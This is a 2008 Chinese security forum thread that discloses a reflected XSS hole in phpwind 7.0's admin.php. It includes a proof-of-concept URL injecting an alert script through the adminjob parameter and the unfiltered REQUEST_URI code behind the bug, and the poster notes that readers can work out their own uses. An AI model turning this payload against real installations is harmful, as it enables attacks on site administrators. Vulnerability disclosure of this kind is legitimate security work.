找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
NB5牛论坛»首页 技术交流区 网安技术 phpwind V7.0 XSS 漏洞
返回列表 发新帖
查看: 739|回复: 1

phpwind V7.0 XSS 漏洞

[复制链接]
nchack007

242

主题

2213

回帖

3883

牛毛

版块主管

www.nb5.cn

积分
10239
发表于 2008-12-26 02:11:33 | 显示全部楼层
高手就是不一样。
回复

举报

yaoqing

22

主题

1

回帖

30

牛毛

初生牛犊

积分
30
 楼主| 发表于 2008-12-25 22:36:14 | 显示全部楼层 |阅读模式 来自 黑龙江省哈尔滨市
文章作者:hiphop
信息来源:噩靈戰隊[Evil-Soul Security Team](http://bbs.x-xox-x.com

http://site/upload2/admin.php?adminjob=%22><script>alert(%27hiphop%27)</script>



$REQUEST_URI = $_SERVER[&#39;PHP_SELF&#39;].&#39;?&#39;.$_SERVER[&#39;QUERY_STRING&#39;];
$wind_version = &#39;7.0&#39;;
$wind_repair= &#39;&#39;;

从外面任何QUERY_STRING没做过滤导致漏洞
看到官方最近更新版本
就来看一下源始码发现满多漏洞的
先发一个后台xss漏洞要怎样玩看个人思路了
文章
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-28 21:29 , Processed in 0.332245 second(s), 39 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表